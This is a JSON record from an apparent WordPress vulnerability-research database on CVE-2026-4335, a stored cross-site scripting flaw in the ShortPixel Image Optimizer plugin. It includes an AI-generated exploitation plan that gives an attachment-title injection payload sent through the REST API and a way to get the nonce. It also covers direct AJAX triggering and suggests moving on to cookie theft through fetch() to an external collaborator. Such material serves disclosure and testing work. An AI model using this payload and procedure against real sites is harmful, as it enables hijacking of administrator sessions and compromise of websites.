[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fUk_fjuMQJ4gHyIp8kS9Ghf-PkOC-0UAiz5YZQ_qXsEs":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":34,"research_started_at":35,"research_completed_at":36,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":37},"CVE-2026-4335","shortpixel-image-optimizer-authenticated-author-stored-cross-site-scripting-via-attachment-title","ShortPixel Image Optimizer \u003C= 6.4.3 - Authenticated (Author+) Stored Cross-Site Scripting via Attachment Title","The ShortPixel Image Optimizer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the attachment post_title in all versions up to, and including, 6.4.3. This is due to insufficient output escaping in the getEditorPopup() function and its corresponding media-popup.php template. Specifically, the attachment's post_title is retrieved from the database via get_post() in AjaxController.php (line 435) and passed directly to the view template (line 449), where it is rendered into an HTML input element's value attribute without esc_attr() escaping (media-popup.php line 139). Since WordPress allows Authors to set arbitrary attachment titles (including double-quote characters) via the REST API, a malicious author can craft an attachment title that breaks out of the HTML attribute and injects arbitrary JavaScript event handlers. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts that execute whenever a higher-privileged user (such as an administrator) opens the ShortPixel AI editor popup (Background Removal or Image Upscale) for the poisoned attachment.","shortpixel-image-optimiser",null,"\u003C=6.4.3","6.4.4","medium",5.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:R\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-03-25 00:00:00","2026-03-26 02:25:20",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fa156234f-2644-4d17-aaa5-4f088cf48f73?source=api-prod",1,[22,23,24,25,26,27,28,29],"class\u002FController\u002FApi\u002FAiController.php","class\u002FController\u002FApi\u002FApiController.php","class\u002FController\u002FApi\u002FRequestManager.php","class\u002FController\u002FBulkController.php","class\u002FController\u002FFront\u002FCDNController.php","class\u002FController\u002FFront\u002FPageConverter.php","class\u002FController\u002FFront\u002FPictureController.php","class\u002FController\u002FOptimizer\u002FOptimizeAiController.php","researched",false,3,"This exploitation research plan targets **CVE-2026-4335**, a stored Cross-Site Scripting (XSS) vulnerability in the **ShortPixel Image Optimizer** plugin (\u003C= 6.4.3).\n\n---\n\n### 1. Vulnerability Summary\nThe vulnerability exists because the plugin fails to properly escape the `post_title` of a WordPress attachment when rendering it inside the ShortPixel AI editor popup (used for \"Background Removal\" or \"Image Upscale\"). While WordPress core generally sanitizes titles for HTML display, it allows Authors and above to include double-quote characters (`\"`) through the REST API. \n\nWhen an administrator opens the AI editor for a poisoned attachment, the `getEditorPopup()` function in `AjaxController.php` fetches the attachment's `post_title` via `get_post()` and passes it to the `media-popup.php` template. In this template (at line 139), the title is echoed directly into the `value` attribute of an HTML `\u003Cinput>` element without using `esc_attr()`. This allows an attacker to break out of the attribute and inject JavaScript event handlers (e.g., `onerror`, `onfocus`).\n\n### 2. Attack Vector Analysis\n*   **Vulnerable Endpoint**: The AI Editor Popup UI, specifically the rendering logic in `media-popup.php`.\n*   **Injection Point**: Attachment `post_title` (via REST API or Media Library).\n*   **Trigger Action**: An Administrator opening the ShortPixel AI editor popup (Background Removal or Upscale) for a specific attachment.\n*   **Required Authentication**: Author-level access to upload and modify media.\n*   **Preconditions**: \n    1.  The plugin must be active.\n    2.  A valid ShortPixel API key might be required for the AI buttons to appear in the UI (though the AJAX endpoint itself may be directly reachable).\n\n### 3. Code Flow\n1.  **Injection**: Author-level user sends a `POST` request to `\u002Fwp-json\u002Fwp\u002Fv2\u002Fmedia\u002F[ID]` setting the `title` to a malicious payload.\n2.  **Retrieval**: An administrator clicks \"Background Remove\" or \"Upscale\" in the Media Library.\n3.  **AJAX Call**: The browser sends an AJAX request (likely `action: shortpixel_get_editor_popup`) to `admin-ajax.php`.\n4.  **Backend Processing**:\n    *   `ShortPixel\\Controller\\AjaxController::getEditorPopup()` is called.\n    *   Line 435: `$post = get_post($id);` (Retrieves the attachment object).\n    *   Line 449: The post title is extracted and passed to the view variables.\n5.  **Rendering (Sink)**:\n    *   The template `media-popup.php` is loaded.\n    *   Line 139: `\u003Cinput ... value=\"\u003C?php echo $view->post_title; ?>\" ...>` (Missing `esc_attr`).\n6.  **Execution**: The administrator's browser renders the broken attribute and executes the injected payload.\n\n### 4. Nonce Acquisition Strategy\nThe AJAX action for fetching the editor popup likely requires a nonce. \n\n1.  **Identify the Script**: SPIO enqueues its media scripts on the `upload.php` and `post.php` (Edit Media) pages.\n2.  **Identify the Localized Variable**: The plugin typically localizes data under the object `shortpixel` or `SPIO`. Based on standard SPIO patterns, look for `shortpixel.nonce`.\n3.  **Extraction Procedure**:\n    *   Navigate to `\u002Fwp-admin\u002Fupload.php`.\n    *   Use `browser_eval` to find the nonce:\n        ```javascript\n        \u002F\u002F Check common SPIO localization objects\n        window.shortpixel?.nonce || window.SPIO?.nonce || window.ShortPixelConstants?.nonce\n        ```\n    *   If no specific nonce is found, check for the standard WordPress `_wpnonce` usually used in media actions.\n\n### 5. Exploitation Strategy\n#### Step 1: Injection (Author)\nAuthenticate as an Author and update an existing attachment.\n*   **Tool**: `http_request`\n*   **Method**: `POST`\n*   **URL**: `https:\u002F\u002F[TARGET]\u002Fwp-json\u002Fwp\u002Fv2\u002Fmedia\u002F[ATTACHMENT_ID]`\n*   **Headers**: `Content-Type: application\u002Fjson`\n*   **Body**:\n    ```json\n    {\n      \"title\": \"ShortPixel \\\">\u003Cimg src=x onerror=alert(document.domain)>\"\n    }\n    ```\n\n#### Step 2: Trigger (Admin)\nThe payload executes when the Admin loads the editor popup.\n*   **Method A (UI-based)**:\n    1.  Navigate to `\u002Fwp-admin\u002Fupload.php` (List Mode).\n    2.  Locate the poisoned attachment.\n    3.  Click the \"Background Removal\" or \"Upscale\" button provided by ShortPixel.\n*   **Method B (Direct AJAX)**:\n    1.  Fetch the required nonce for the action (e.g., `sp_get_editor_nonce`).\n    2.  Send a direct request to `admin-ajax.php`.\n    *   **Action**: `shortpixel_get_editor_popup` (Verbatim from description)\n    *   **Parameters**: `id=[ATTACHMENT_ID]`, `action=shortpixel_get_editor_popup`, `_wpnonce=[NONCE]`\n\n### 6. Test Data Setup\n1.  **Users**: Create one user with the `Author` role.\n2.  **Plugin Config**: \n    *   Install and activate ShortPixel Image Optimizer 6.4.3.\n    *   Go to **Settings > ShortPixel** and ensure the plugin is initialized (a fake\u002Fvalid API key might be needed to enable AI features).\n3.  **Media**: Upload a standard `.jpg` image as the Author user to get a valid `ATTACHMENT_ID`.\n\n### 7. Expected Results\n*   **Injection Response**: The REST API should return `200 OK` with the title containing the raw `\">\u003Cimg ...>` string.\n*   **Trigger Response**: The AJAX response (HTML) will contain the following broken fragment:\n    ```html\n    \u003Cinput ... value=\"ShortPixel \">\u003Cimg src=x onerror=alert(document.domain)>\" ...>\n    ```\n*   **Execution**: A browser alert box showing the document domain will appear in the Admin's session.\n\n### 8. Verification Steps\n1.  **Verify DB State**: Use WP-CLI to check the raw title.\n    ```bash\n    wp post get [ID] --field=post_title\n    ```\n2.  **Verify Output**: Use `http_request` to call the AJAX endpoint and check if the payload is unescaped in the response body.\n    ```bash\n    # Look for the unescaped payload in the returned HTML\n    grep -q 'value=\"ShortPixel \">\u003Cimg' response_body.txt\n    ```\n\n### 9. Alternative Approaches\n*   **Payload Variation**: If `alert()` is blocked, use `console.log(document.cookie)` or `fetch()` to an external collaborator.\n*   **Attribute Breakout**: If the `value` attribute is not the only one, try breaking out of other attributes like `data-filename` or `title` if they are rendered in the same popup.\n*   **REST API Bypass**: If the REST API is restricted, try updating the attachment title via the standard `post.php` (Edit Media) screen as an Author, using double quotes in the title field.","gemini-3-flash-preview","2026-04-17 23:01:31","2026-04-17 23:01:54",{"type":38,"vulnerable_version":39,"fixed_version":11,"vulnerable_browse":40,"vulnerable_zip":41,"fixed_browse":42,"fixed_zip":43,"all_tags":44},"plugin","6.4.3","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fshortpixel-image-optimiser\u002Ftags\u002F6.4.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fshortpixel-image-optimiser.6.4.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fshortpixel-image-optimiser\u002Ftags\u002F6.4.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fshortpixel-image-optimiser.6.4.4.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fshortpixel-image-optimiser\u002Ftags"]